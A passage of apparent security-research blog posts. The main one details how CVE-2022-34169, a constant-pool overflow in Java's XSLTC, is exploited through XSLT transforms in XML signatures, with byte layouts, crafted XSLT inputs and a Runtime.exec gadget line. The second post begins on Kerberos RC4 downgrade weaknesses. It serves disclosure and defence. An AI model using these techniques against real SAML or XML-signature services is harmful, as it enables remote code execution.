At this point, only the integrity of the SignedInfo element is protected. To understand how this protection is extended to the actual data, we need to take a look at the way Reference elements work: In theory the Reference URI attribute can either point to an external document (detached signature), an element embedded as a child (enveloping signature) or any element in the outer document (enveloped signature). In practice, most SAML implementations use enveloped signatures and the Reference URI will point to the signed element somewhere in the current document tree.


When a Reference is processed during verification or signing, the referenced content is passed through a chain of Transforms. XMLDsig supports a number of transforms, ranging from canonicalization and Base64 decoding to XPath or even XSLT. Once all transforms have been processed, the resulting byte stream is passed into the cryptographic hash function specified by the DigestMethod element and the result is stored in DigestValue.

This way, as the whole Reference element is part of SignedInfo, its integrity protection gets extended to the referenced element as well. 


Validating an XML signature can therefore be split into two separate steps (sketched in code after the list):

  • Reference Validation: Iterate through all embedded references and for each reference fetch the referenced data, pump it through the Transforms chain and calculate its hash digest. Compare the calculated Digest with the stored DigestValue and fail if they differ.

  • Signature Validation: First canonicalize the SignedInfo element using the specified CanonicalizationMethod algorithm. Calculate the signature of SignedInfo using the algorithm specified in SignatureMethod and the signer key described in KeyInfo. Compare the result with SignatureValue and fail if they differ.
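
As a rough Python sketch of the structure (illustration only, not the JDK's implementation; the transform, canonicalize and verify_sig callables are stand-ins for the real machinery):

import hashlib

def validate_reference(referenced_bytes, transforms, stored_digest):
    data = referenced_bytes
    for transform in transforms:      # the attacker-chosen Transform chain runs first
        data = transform(data)
    return hashlib.sha1(data).digest() == stored_digest   # digest compared last

def validate_signature(signed_info_bytes, canonicalize, verify_sig, signature_value):
    # Canonicalize SignedInfo, then check the cryptographic signature over it.
    return verify_sig(canonicalize(signed_info_bytes), signature_value)

# Toy usage: an identity transform with a matching digest validates successfully.
identity = lambda data: data
assert validate_reference(b"<data/>", [identity], hashlib.sha1(b"<data/>").digest())

Note that the transform chain runs on attacker-controlled input before any digest is compared, which is exactly the attack surface discussed below.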


Interestingly, the order of these two steps can be implementation specific. While the XMLDsig RFC lists Reference Validation as the first step, performing Signature Validation first can have security advantages as we will see later on.


Correctly validating XML signatures and making sure the data we care about is protected is very difficult in the context of SAML. This will be a topic for later blog posts, but at this point we want to focus on the reference validation step:


As part of this step, the application verifying a signature has to run attacker controlled transforms on attacker controlled input. Looking at the list of transformations supported by XMLDsig, one seems particularly interesting: XSLT. 


XSLT, which stands for Extensible Stylesheet Language Transformations, is a feature-rich XML-based programming language designed for transforming XML documents. Embedding an XSLT transform in an XML signature means that the verifier has to run the XSLT program on the referenced XML data. 


The code snippet below gives you an example of a simple XSLT transformation. When executed it fetches each <data> element stored inside <input>, grabs the first character of its content and returns it as part of its <output>. So <input><data>abc</data><data>def</data></input> would be transformed into <output><data>a</data><data>d</data></output>.

<Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">

  <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"

   xmlns="http://www.w3.org/TR/xhtml1/strict" exclude-result-prefixes="foo"   

   version="1.0">

   <xsl:output encoding="UTF-8" indent="no" method="xml" />

   <xsl:template match="/input">

                    <output>

                          <xsl:for-each select="data">

                              <data><xsl:value-of select="substring(.,1,1)" /></data>

                          </xsl:for-each>

                    </output>

  </xsl:template>

 </xsl:stylesheet>

</Transform>


Exposing a fully-featured language runtime to an external attacker seems like a bad idea, so let's take a look at how this feature is implemented in Java’s OpenJDK.


XSLT in Java


Java's main interface for working with XML signatures is the javax.xml.crypto.dsig.XMLSignature class and its sign and validate methods. We are mostly interested in the validate method, which is shown below:


// https://github.com/openjdk/jdk/blob/master/src/java.xml.crypto/share/classes/org/jcp/xml/dsig/internal/dom/DOMXMLSignature.java

@Override

    public boolean validate(XMLValidateContext vc)

        throws XMLSignatureException

    {

        [..]

        // validate the signature

        boolean sigValidity = sv.validate(vc); (A)

        if (!sigValidity) {

            validationStatus = false;

            validated = true;

            return validationStatus;

        }


        // validate all References

        @SuppressWarnings("unchecked")

        List<Reference> refs = this.si.getReferences();

        boolean validateRefs = true;

        for (int i = 0, size = refs.size(); validateRefs && i < size; i++) {

            Reference ref = refs.get(i);

            boolean refValid = ref.validate(vc); (B)

            LOG.debug("Reference [{}] is valid: {}", ref.getURI(), refValid);

            validateRefs &= refValid;

        }

        if (!validateRefs) {

            LOG.debug("Couldn't validate the References");

            validationStatus = false;

            validated = true;

            return validationStatus;

        } 

   [..]

   }


As we can see, the validate method first validates the signature of the SignedInfo element in (A) before validating all the references in (B).  This means that an attack against the XSLT runtime will require a valid signature for the SignedInfo element and we’ll discuss later how an attacker can bypass this requirement.


The call to ref.validate() in (B) ends up in the DOMReference.validate method shown below:

public boolean validate(XMLValidateContext validateContext)

        throws XMLSignatureException

    {

        if (validateContext == null) {

            throw new NullPointerException("validateContext cannot be null");

        }

        if (validated) {

            return validationStatus;

        }

        Data data = dereference(validateContext); (D)

        calcDigestValue = transform(data, validateContext); (E)


        [..]

        validationStatus = Arrays.equals(digestValue, calcDigestValue); (F)

        validated = true;

        return validationStatus;

    }




The code gets the referenced data in (D), transforms it in (E) and compares the digest of the result with the digest stored in the signature in (F). Most of the complexity is hidden behind the call to transform in (E) which loops through all Transform elements defined in the Reference and executes them.


As this is Java, we have to walk through a lot of indirection layers before we end up at the interesting parts. Take a look at the call stack below if you want to follow along and step through the code:


at com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.newTransformer(TemplatesImpl.java:584)
at com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl.newTransformer(TransformerFactoryImpl.java:818)
at com.sun.org.apache.xml.internal.security.transforms.implementations.TransformXSLT.enginePerformTransform(TransformXSLT.java:130)
at com.sun.org.apache.xml.internal.security.transforms.Transform.performTransform(Transform.java:316)
at org.jcp.xml.dsig.internal.dom.ApacheTransform.transformIt(ApacheTransform.java:188)
at org.jcp.xml.dsig.internal.dom.ApacheTransform.transform(ApacheTransform.java:124)
at org.jcp.xml.dsig.internal.dom.DOMTransform.transform(DOMTransform.java:173)
at org.jcp.xml.dsig.internal.dom.DOMReference.transform(DOMReference.java:457)
at org.jcp.xml.dsig.internal.dom.DOMReference.validate(DOMReference.java:387)
at org.jcp.xml.dsig.internal.dom.DOMXMLSignature.validate(DOMXMLSignature.java:281)


If we specify an XSLT transform and the org.jcp.xml.dsig.secureValidation property isn't enabled (we'll come back to this later), we will end up in the file src/java.xml/share/classes/com/sun/org/apache/xalan/internal/xsltc/trax/TransformerFactoryImpl.java, which is part of a module called XSLTC.


XSLTC, the XSLT compiler, is originally part of the Apache Xalan project. OpenJDK forked Xalan-J, a Java based XSLT runtime, to provide XSLT support as part of Java’s standard library. While the original Apache project has a number of features that are not supported in the OpenJDK fork, most of the core code is identical and CVE-2022-34169 affected both codebases. 


XSLTC is responsible for compiling XSLT stylesheets into Java classes to improve performance compared to a naive interpretation based approach. While this has advantages when repeatedly running the same stylesheet over large amounts of data, it is a somewhat surprising choice in the context of XML signature validation. Thinking about this from an attacker's perspective, we can now provide arbitrary inputs to a fully-featured JIT compiler. Talk about an unexpected attack surface! 


A bug in XSLTC

    /**

     * As Gregor Samsa awoke one morning from uneasy dreams he found himself

     * transformed in his bed into a gigantic insect. He was lying on his hard,

     * as it were armour plated, back, and if he lifted his head a little he

     * could see his big, brown belly divided into stiff, arched segments, on

     * top of which the bed quilt could hardly keep in position and was about

     * to slide off completely. His numerous legs, which were pitifully thin

     * compared to the rest of his bulk, waved helplessly before his eyes.

     * "What has happened to me?", he thought. It was no dream....

     */

    protected final static String DEFAULT_TRANSLET_NAME = "GregorSamsa";

Turns out that the author of this codebase was a Kafka fan. 


So what does this compilation process look like? XSLTC takes an XSLT stylesheet as input and returns a JIT'ed Java class, called a translet, as output. The JVM then loads this class, constructs it and the XSLT runtime executes the transformation via a JIT'ed method. 


Java class files contain the JVM bytecode for all class methods, a so-called constant pool describing all constants used and other important runtime details such as the name of its super class or access flags. 


// https://docs.oracle.com/javase/specs/jvms/se18/html/jvms-4.html

ClassFile {

    u4             magic;

    u2             minor_version;

    u2             major_version;

    u2             constant_pool_count;

    cp_info        constant_pool[constant_pool_count-1]; // cp_info is a variable-sized object

    u2             access_flags;

    u2             this_class;

    u2             super_class;

    u2             interfaces_count;

    u2             interfaces[interfaces_count];

    u2             fields_count;

    field_info     fields[fields_count];

    u2             methods_count;

    method_info    methods[methods_count];

    u2             attributes_count;

    attribute_info attributes[attributes_count];

}


XSLTC depends on the Apache Byte Code Engineering Library (BCEL) to dynamically create Java class files. As part of the compilation process, constants in the XSLT input such as Strings or Numbers get translated into Java constants, which are then stored in the constant pool. The following code snippet shows how an XSLT integer expression gets compiled: Small integers that fit into a byte or short are stored inline in bytecode using the bipush or sipush instructions. Larger ones are added to the constant pool using the cp.addInteger method:


// org/apache/xalan/xsltc/compiler/IntExpr.java

public void translate(ClassGenerator classGen, MethodGenerator methodGen) {

        ConstantPoolGen cpg = classGen.getConstantPool();

        InstructionList il = methodGen.getInstructionList();

        il.append(new PUSH(cpg, _value));

    }

// org/apache/bcel/internal/generic/PUSH.java

public PUSH(final ConstantPoolGen cp, final int value) {

        if ((value >= -1) && (value <= 5)) {

            instruction = InstructionConst.getInstruction(Const.ICONST_0 + value);

        } else if (Instruction.isValidByte(value)) {

            instruction = new BIPUSH((byte) value);

        } else if (Instruction.isValidShort(value)) {

            instruction = new SIPUSH((short) value);

        } else {

            instruction = new LDC(cp.addInteger(value));

        }

    }
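
Restated in a few lines of illustrative Python (using Java's standard byte and short ranges), only integers that fit neither a byte nor a short force a new constant pool entry:

def push_strategy(value):
    # Mirrors the dispatch in PUSH: small values stay inline in the bytecode.
    if -1 <= value <= 5:
        return "iconst"
    if -128 <= value <= 127:
        return "bipush"
    if -32768 <= value <= 32767:
        return "sipush"
    return "ldc via cp.addInteger"   # only this path grows the constant pool

assert push_strategy(65536) == "ldc via cp.addInteger"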


The problem with this approach is that neither XSLTC nor BCEL correctly limits the size of the constant pool. As constant_pool_count, which describes the size of the constant pool, is only 2 bytes long, its maximum size is limited to 2**16 - 1 or 65535 entries. In practice even fewer entries are possible, because some constant types take up two entries. However, BCEL's internal constant pool representation uses a standard Java array for storing constants, and does not enforce any limit on its length.

When XSLTC processes a stylesheet that contains more constants than that, and BCEL's internal class representation is serialized to a class file at the end of the compilation process, the array length is truncated to a short, but the complete array is written out.

This means that constant_pool_count will now contain a small value and that parts of the attacker-controlled constant pool will get interpreted as the class fields following the constant pool, including method and attribute definitions. 
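
The truncation itself is easy to demonstrate in a few lines of illustrative Python (0x10703 is the entry count the exploit aims for later):

import struct

count = 0x10703                       # entries actually present in BCEL's array
truncated = count & 0xFFFF            # what survives in the u2 constant_pool_count
print(hex(truncated))                 # 0x703
print(struct.pack(">H", truncated))   # b'\x07\x03', as written to the class file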

Exploiting a constant pool overflow


To understand how we can exploit this, we first need to take a closer look at the content of the constant pool.  Each entry in the pool starts with a 1-byte tag describing the kind of constant, followed by the actual data. The table below shows an incomplete list of constant types supported by the JVM (see the official documentation for a complete list). No need to read through all of them but we will come back to this table a lot when walking through the exploit. 

CONSTANT_Utf8 (tag 1): Constant variable-sized UTF-8 string value.

CONSTANT_Utf8_info {
    u1 tag;
    u2 length;
    u1 bytes[length];
}

CONSTANT_Integer (tag 3): 4-byte integer.

CONSTANT_Integer_info {
    u1 tag;
    u4 bytes;
}

CONSTANT_Float (tag 4): 4-byte float.

CONSTANT_Float_info {
    u1 tag;
    u4 bytes;
}

CONSTANT_Long (tag 5): 8-byte long.

CONSTANT_Long_info {
    u1 tag;
    u4 high_bytes;
    u4 low_bytes;
}

CONSTANT_Double (tag 6): 8-byte double.

CONSTANT_Double_info {
    u1 tag;
    u4 high_bytes;
    u4 low_bytes;
}

CONSTANT_Class (tag 7): Reference to a class. Links to a Utf8 constant describing the name.

CONSTANT_Class_info {
    u1 tag;
    u2 name_index;
}

CONSTANT_String (tag 8): A JVM “String”. Links to a UTF8 constant.

CONSTANT_String_info {
    u1 tag;
    u2 string_index;
}

CONSTANT_Fieldref (tag 9), CONSTANT_Methodref (tag 10), CONSTANT_InterfaceMethodref (tag 11): Reference to a class field or method. Links to a Class constant.

CONSTANT_Fieldref_info {
    u1 tag;
    u2 class_index;
    u2 name_and_type_index;
}

CONSTANT_Methodref_info {
    u1 tag;
    u2 class_index;
    u2 name_and_type_index;
}

CONSTANT_InterfaceMethodref_info {
    u1 tag;
    u2 class_index;
    u2 name_and_type_index;
}

CONSTANT_NameAndType (tag 12): Describes a field or method.

CONSTANT_NameAndType_info {
    u1 tag;
    u2 name_index;
    u2 descriptor_index;
}

CONSTANT_MethodHandle (tag 15): Describes a method handle.

CONSTANT_MethodHandle_info {
    u1 tag;
    u1 reference_kind;
    u2 reference_index;
}

CONSTANT_MethodType (tag 16): Describes a method type. Points to a UTF8 constant containing a method descriptor.

CONSTANT_MethodType_info {
    u1 tag;
    u2 descriptor_index;
}



A perfect constant type for exploiting CVE-2022-34169 would be dynamically sized and contain fully attacker controlled content. Unfortunately, no such type exists. While CONSTANT_Utf8 is dynamically sized, its content isn't a raw string representation but an encoding format the JVM calls “modified UTF-8”. This encoding introduces some significant restrictions on the data stored and rules out null bytes, making it mostly useless for corrupting class fields. 
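
To see why, note that the JVM's modified UTF-8 encodes the null code point U+0000 as the two bytes 0xC0 0x80, so a Utf8 constant can never contain a raw 0x00 byte. A small illustrative Python encoder for BMP code points (ignoring surrogate pairs) demonstrates this:

def modified_utf8(s):
    out = bytearray()
    for cp in map(ord, s):
        if 1 <= cp <= 0x7F:                    # plain ASCII stays one byte
            out.append(cp)
        elif cp <= 0x7FF:                      # includes U+0000
            out += bytes([0xC0 | (cp >> 6), 0x80 | (cp & 0x3F)])
        else:                                  # remaining BMP code points
            out += bytes([0xE0 | (cp >> 12),
                          0x80 | ((cp >> 6) & 0x3F),
                          0x80 | (cp & 0x3F)])
    return bytes(out)

assert modified_utf8("\x00") == b"\xC0\x80"    # no raw null byte possible
assert b"\x00" not in modified_utf8("A\x00B")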


The next best thing we can get is a fixed-size constant type with full control over the content. CONSTANT_Long seems like an obvious candidate, but XSLTC never creates attacker-controlled long constants during the compilation process. Instead we can use large floating point numbers to create CONSTANT_Double entries with (almost) fully controlled content. This gives us a nice primitive where we can corrupt class fields behind the constant pool with a byte pattern like 0x06 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0xXX 0x06 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0xYY 0x06 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ 0xZZ.
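
Finding the decimal literal that produces a given 8-byte pattern is mechanical. A short illustrative Python sketch (the byte values are examples; patterns decoding to NaNs need care, as their literals may not round-trip):

import struct

# Example target bytes for a CONSTANT_Double body (after the 0x06 tag byte).
desired = bytes([0x00, 0x01, 0xCC, 0xCC, 0xDD, 0xDD, 0x00, 0x03])
value = struct.unpack(">d", desired)[0]     # the double to embed in the stylesheet
assert struct.pack(">d", value) == desired  # XSLTC stores these bytes after the tag
print(repr(value))   # a tiny subnormal literal, like the ceiling() argument later on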


Unfortunately, this primitive alone isn’t sufficient for crafting a useful class file due to the requirements of the fields right after the constant_pool:


    cp_info        constant_pool[constant_pool_count-1];

    u2             access_flags;

    u2             this_class;

    u2             super_class;


access_flags is a big endian mask of flags describing access permissions and properties of the class. 

While the JVM is happy to ignore unknown flag values, we need to avoid setting flags like ACC_INTERFACE (0x0200) or ACC_ABSTRACT (0x0400) that result in an unusable class. This means that we can’t use a CONSTANT_Double entry as our first out-of-bound constant as its tag byte of 0x06 will get interpreted as these flags.


this_class is an index into the constant pool and has to point to a CONSTANT_Class entry that describes the class defined with this file. Fortunately, neither the JVM nor XSLTC cares much about which class we pretend to be, so this value can point to almost any CONSTANT_Class entry that XSLTC ends up generating. (The only restriction is that it can’t be a part of a protected namespace like java.lang.)


super_class is another index to a CONSTANT_Class entry in the constant pool. While the JVM is happy with any class, XSLTC expects this to be a reference to the org.apache.xalan.xsltc.runtime.AbstractTranslet class, otherwise loading and initialization of the class file fails.


After a lot of trial and error I ended up with the following approach to meet these requirements:


CONST_STRING          CONST_DOUBLE

0x08 0x07 0x02  0x06 0xXX 0xXX 0x00 0x00 0x00 0x00 0xZZ 0xZZ

access_flags  this_class  super_class  interfaces_count  fields_count  methods_count


  1. We craft a XSLT input that results in 0x10703 constants in the pool. This will result in a truncated pool size of 0x703 and the start of the constant at index 0x703 (due to 0 based indexing) will be interpreted as access_flags.

  2. During compilation of the input, we trigger the addition of a new string constant when the pool has 0x702 constants. This will first create a CONSTANT_Utf8 entry at index 0x702 and a CONSTANT_String entry at 0x703. The String entry will reference the preceding Utf8 constant so its value will be the tag byte 0x08 followed by the index 0x07 0x02. This results in a usable access_flags value of 0x0807. 

  3. Add a CONSTANT_Double entry at index 0x704. Its 0x06 tag byte will be interpreted as part of the this_class field. The following 2 bytes can then be used to control the value of the super_class field. By setting the next 4 bytes to 0x00, we create an empty interface and fields arrays, before setting the last two bytes to the number of methods we want to define. 


The only remaining requirement is that we need to add a CONSTANT_Class entry at index 0x206 of the constant pool, which is relatively straightforward. 
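
To make the byte alignment concrete, here is an illustrative Python view of how the JVM parser consumes the overlapping bytes (the super_class and methods_count values are example placeholders):

import struct

# Bytes starting at pool index 0x703, as XSLTC/BCEL lays them out:
overflow = bytes([0x08, 0x07, 0x02,        # CONSTANT_String: tag, utf8 index 0x0702
                  0x06,                    # CONSTANT_Double tag (lands in this_class)
                  0x02, 0x08,              # first Double data bytes: example super_class
                  0x00, 0x00, 0x00, 0x00,  # interfaces_count = 0, fields_count = 0
                  0x00, 0x02])             # methods_count = 2
(access_flags, this_class, super_class,
 interfaces_count, fields_count, methods_count) = struct.unpack(">6H", overflow)
assert access_flags == 0x0807    # usable: no ACC_INTERFACE/ACC_ABSTRACT bits set
assert this_class == 0x0206      # 0x02 from the String index plus the 0x06 tag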


The snippet below shows part of the generated XSLT input that will overwrite the first header fields. After filling the constant pool with a large number of string constants for the attribute fields and values, the CONST_STRING entry for the `jEb` element ends up at index 0x703. The XSLT function call to the `ceiling` function then triggers the addition of a controlled CONST_DOUBLE entry at index 0x704:


<jse jsf='jsg' … jDL='jDM' jDN='jDO' jDP='jDQ' jDR='jDS' jDT='jDU' jDV='jDW' jDX='jDY' jDZ='jEa' /><jEb />


<xsl:value-of select='ceiling(0.000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008344026969402015)'/>


We constructed the initial header fields and are now in the interesting part of the class file definition: The methods table. This is where all methods of a class and their bytecode is defined. After XSLTC generates a Java class, the XSLT runtime will load the class and instantiate an object, so the easiest way to achieve arbitrary code execution is to create a malicious constructor. Let’s take a look at the methods table to see how we can define a working constructor:


ClassFile {

    [...]

    u2             methods_count;

    method_info    methods[methods_count];

    [...]

}

    

method_info {

    u2             access_flags;

    u2             name_index;

    u2             descriptor_index;

    u2             attributes_count;

    attribute_info attributes[attributes_count];

}


attribute_info {

    u2 attribute_name_index;

    u4 attribute_length;

    u1 info[attribute_length];

}



Code_attribute {

    u2 attribute_name_index;

    u4 attribute_length;

    u2 max_stack;

    u2 max_locals;

    u4 code_length;

    u1 code[code_length];

    u2 exception_table_length;

    {   u2 start_pc;

        u2 end_pc;

        u2 handler_pc;

        u2 catch_type;

    } exception_table[exception_table_length];

    u2 attributes_count;

    attribute_info attributes[attributes_count];

}



The methods table is a dynamically sized array of method_info structs. Each of these structs describes the access_flags of the method, an index into the constant table that points to its name (as a utf8 constant), and another index pointing to the method descriptor (another CONSTANT_Utf8). 

This is followed by the attributes table, a dynamically sized map from Utf8 keys stored in the constant table to dynamically sized values stored inline. Fortunately, the only attribute we need to provide is the Code attribute, which contains the actual bytecode of the method. 



Going back to our payload, we can see that the start of the methods table is aligned with the tag byte of the next entry in the constant pool table. This means that the 0x06 tag of a CONSTANT_Double will clobber the access_flags field of the first method, making it unusable for us. Instead we have to create two methods: the first one as a basic filler to get the alignment right, and the second one as the actual constructor. Fortunately, the JVM ignores unknown attributes, so we can use dynamically sized attribute values. The graphic below shows how we use a series of CONST_DOUBLE entries to create a constructor method with an almost fully controlled body.


CONST_DOUBLE: 0x06 0x01 0xXX 0xXX 0xYY 0xYY 0x00 0x01 0xZZ

CONST_DOUBLE: 0x06 0x00 0x00 0x00 0x05 0x00 0x00 0x00 0x00

CONST_DOUBLE: 0x06 0x00 0x01 0xCC 0xCC 0xDD 0xDD 0x00 0x03

CONST_DOUBLE: 0x06 0x00 0x00 0x00 0x00 0x04 0x00 0x00 0x00

CONST_DOUBLE: 0x06 0xCC 0xDD 0xZZ 0xZZ 0xZZ 0xZZ 0xAA 0xAA

CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA

CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA

CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA

CONST_DOUBLE: 0x06 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA 0xAA


First Method Header

access_flags 0x0601 

name_index  0xXXXX

desc_index 0xYYYY  

attr_count 0x0001

Attribute [0]

name_index 0xZZ06

length 0x00000005

data   “\x00\x00\x00\x00\x06”


Second Method Header

access_flags 0x0001

name_index  0xCCCC -> <init>

desc_index 0xDDDD  -> ()V

attr_count 0x0003 


Attribute [0]

name_index 0x0600

length 0x00000004

data   “\x00\x00\x00\x06

Attribute [1]

name_index 0xCCDD -> Code

length 0xZZZZZZZZ

data  PAYLOAD

Attribute [2] ...



We still need to bypass one limitation: JVM bytecode does not work standalone; it references and relies on entries in the constant pool. Instantiating a class or calling a method requires a corresponding constant pool entry. This is a problem, as our bug doesn't give us the ability to create fake constant pool entries, so we are limited to constants that XSLTC adds during compilation.


Luckily, there is a way to add arbitrary class and method references to the constant pool: Java’s XSLT runtime supports calling arbitrary Java methods. As this is clearly insecure, this functionality is protected by a runtime setting and always disabled during signature verification.

However, XSLTC will still process and compile these function calls when processing a stylesheet; the call is only blocked at runtime (see the corresponding code in FunctionCall.java). This means that we can get references to all required methods and classes by adding an XSLT element like the one shown below:


<xsl:value-of select="rt:exec(rt:getRuntime(),'...')" xmlns:rt="java.lang.Runtime"/>



There are two final checks we need to bypass, before we end up with a working class file:

  • The JVM enforces that every constructor of a subclass calls a superclass constructor before returning. This check can be bypassed by never returning from our constructor, either by adding an endless loop at the end or by throwing an exception, which is the approach I used in my exploit proof-of-concept. A slightly more complex, but cleaner approach is to add a reference to the AbstractTranslet constructor to the constant pool and call it. This is the approach used by thanat0s in their exploit writeup.

  • Finally, we need to skip over the rest of XSLTC’s output. This can be done by constructing a single large attribute with the right size as an element in the class attribute table.



Once we chain all of this together we end up with a signed XML document that can trigger the execution of arbitrary JVM bytecode during signature verification. I've skipped over some implementation details of this exploit, so if you want to reproduce this vulnerability please take a look at the heavily commented proof-of-concept script.


Impact and Restrictions

In theory every unpatched Java application that processes XML signatures is vulnerable to this exploit. However, there are two important restrictions:


As references are only processed after the signature of the SignedInfo element is verified, applications can be protected based on their usage of the KeySelector class. Applications that use an allowlist of trusted keys in their KeySelector will be protected as long as these keys are not compromised. An example of this would be a single-tenant SAML SP configured with a single trusted IdP key. In practice, a lot of these applications are still vulnerable as they don't use KeySelector directly and will instead enforce this restriction in their own application logic after an unrestricted signature validation. At this point the vulnerability has already been triggered. Multi-tenant SAML applications that support customer-provided Identity Providers, as most modern cloud SaaS do, are also not protected by this limitation.

SAML Identity Providers can only be attacked if they support (and verify) signed SAML requests.


Even without CVE-2022-34169, processing XSLT during signature verification can be easily abused as part of a DoS attack. For this reason, the property org.jcp.xml.dsig.secureValidation can be enabled to forbid XSLT transformation in XML signatures. Interestingly this property defaults to false for all JDK versions <17, if the application is not running under the Java security manager. As the Security Manager is rarely used for server side applications and JDK 17 was only released a year ago, we expect that a lot of applications are not protected by this. Limited testing of large java-based SSO providers confirmed this assumption. Another reason for a lack of widespread usage might be that org.jcp.xml.dsig.secureValidation also disables use of the SHA1 algorithm in newer JDK versions. As SHA1 is still widely used by enterprise customers, simply enabling the property without manually configuring a suitable jdk.xml.dsig.secureValidationPolicy might not be feasible.

Conclusion

XML signatures in general and SAML in particular offer a large and complex attack surface to external attackers. Even though Java offers configuration options that can be used to address this vulnerability, they are complex, might break real-world use cases and are off by default. 


Developers that rely on SAML should make sure they understand the risks associated with it and should reduce the attack surface as much as possible by disabling functionality that is not required for their use case. Additional defense-in-depth approaches like early validation of signing keys, an allow-list based approach to valid transformation chains and strict schema validation of SAML tickets can be used for further hardening.


RC4 Is Still Considered Harmful

27 October 2022 at 19:48

By James Forshaw, Project Zero


I've been spending a lot of time researching Windows authentication implementations, specifically Kerberos. In June 2022 I found an interesting issue (number 2310) in the handling of RC4 encryption that allowed you to authenticate as another user, either if you could interpose on the Kerberos network traffic to and from the KDC or directly if the user was configured to disable typical pre-authentication requirements.


This blog post goes into more detail on how this vulnerability works and how I was able to exploit it with only a bare minimum of brute forcing required. Note, I'm not going to spend time fully explaining how Kerberos authentication works; there are plenty of resources online. For example, this blog post by Steve Syfuhs, who works at Microsoft, is a good first start.

Background

Kerberos is a very old authentication protocol. The current version (v5) was described in RFC1510 back in 1993, although it was updated in RFC4120 in 2005. As Kerberos' core security concept is using encryption to prove knowledge of a user's credentials, the design allows for negotiating the encryption and checksum algorithms that the client and server will use. 


For example, when sending the initial authentication service request (AS-REQ) to the Key Distribution Center (KDC), a client can specify a list of supported encryption algorithms, as predefined integer identifiers, as shown below in the snippet of the ASN.1 definition from RFC4120.


KDC-REQ-BODY    ::= SEQUENCE {

...

    etype    [8] SEQUENCE OF Int32 -- EncryptionType

                                   -- in preference order --,

...

}


When the server receives the request it checks its list of supported encryption types and the ones the user's account supports (which is based on what keys the user has configured) and then will typically choose the one the client most preferred. The selected algorithm is then used for anything requiring encryption, such as generating session keys or the EncryptedData structure as shown below:


EncryptedData   ::= SEQUENCE {

        etype   [0] Int32 -- EncryptionType --,

        kvno    [1] UInt32 OPTIONAL,

        cipher  [2] OCTET STRING -- ciphertext

}


The KDC will send back an authentication service reply (AS-REP) structure containing the user's Ticket Granting Ticket (TGT) and an EncryptedData structure which contains the session key necessary to use the TGT to request service tickets. The user can then use their known key which corresponds to the requested encryption algorithm to decrypt the session key and complete the authentication process.


Diagram showing the basic Kerberos authentication flow, with the client requesting an AES key type.

This flexibility in selecting an encryption algorithm is both a blessing and a curse. In the original implementations of Kerberos only DES encryption was supported, which by modern standards is far too weak. Because of the flexibility developers were able to add support for AES through RFC3962 which is supported by all modern versions of Windows. This can then be negotiated between client and server to use the best algorithm both support. However, unless weak algorithms are explicitly disabled there's nothing stopping a malicious client or server from downgrading the encryption algorithm in use and trying to break Kerberos using cryptographic attacks.


Modern versions of Windows have started to disable DES as a supported encryption algorithm, preferring AES. However, there's another encryption algorithm which Windows supports which is still enabled by default, RC4. This algorithm was used in Kerberos by Microsoft for Windows 2000, although its documentation was in draft form until RFC4757 was released in 2006. 


The RC4 stream cipher has many substantial weaknesses, but when it was introduced it was still considered a better option than DES which has been shown to be sufficiently vulnerable to hardware cracking such as the EFF's "Deep Crack". Using RC4 also had the advantage that it was relatively easy to operate in a reduced key size mode to satisfy US export requirements of cryptographic systems. 


If you read the RFC for the implementation of RC4 in Kerberos, you'll notice it doesn't use the stream cipher as-is. Instead it puts in place various protections to guard against common cryptographic attacks (a code sketch of the construction follows the list):

  • The encrypted data is protected by a keyed MD5 HMAC hash to prevent tampering which is trivial with a simple stream cipher such as RC4. The hashed data includes a randomly generated 8-byte "confounder" so that the hash is randomized even for the same plain text.

  • The key used for the encryption is derived from the hash and a base key. This, combined with the confounder makes it almost certain the same key is never reused for the encryption.

  • The base key is not the user's key, but instead is derived from an MD5 HMAC keyed with the user's key over a 4-byte message type value. For example, the message type is different for the AS-REQ and the AS-REP structures. This prevents an attacker from using Kerberos as an encryption oracle and reusing existing encrypted data in unrelated parts of the protocol.
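
Here is a minimal Python sketch of that construction, assuming the RFC 4757 profile (T is the 4-byte little-endian message type; the final RC4 pass itself is elided):

import hmac, hashlib, os, struct

def rc4_hmac_keys(user_key, message_type, plaintext):
    # Base key derived from the message type, not the user's key directly.
    k1 = hmac.new(user_key, struct.pack("<I", message_type), hashlib.md5).digest()
    # Random confounder makes the checksum differ even for identical plaintexts.
    confounder = os.urandom(8)
    checksum = hmac.new(k1, confounder + plaintext, hashlib.md5).digest()
    # Per-message encryption key derived from the checksum, so it's never reused.
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    # The actual output would be: checksum || RC4(k3, confounder || plaintext)
    return checksum, k3, confounder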


Many of the known weaknesses of RC4 are related to gathering a significant quantity of ciphertext encrypted with a known key. Due to the design of the RC4-HMAC algorithm and the general functional principles of Kerberos this is not really a significant concern. However, the biggest weakness of RC4 as defined by Microsoft for Kerberos is not so much the algorithm, but the generation of the user's key from their password. 


As already mentioned Kerberos was introduced in Windows 2000 to replace the existing NTLM authentication process used from NT 3.1. However, there was a problem of migrating existing users to the new authentication protocol. In general the KDC doesn't store a user's password, instead it stores a hashed form of that password. For NTLM this hash was generated from the Unicode password using a single pass of the MD4 algorithm. Therefore to make an easy upgrade path Microsoft specified that the RC4-HMAC Kerberos key was this same hash value.


As the MD4 output is 16 bytes in size it wouldn't be practical to brute force the entire key. However, the hash algorithm has no protections against brute-force attacks, for example no salting or multiple iterations. If an attacker has access to ciphertext encrypted using the RC4-HMAC key they can attempt to brute force the key by guessing passwords. As users tend to choose weak or trivial passwords, this increases the chance that a brute force attack will recover the key. And with the key the attacker can then authenticate as that user to any service they like. 


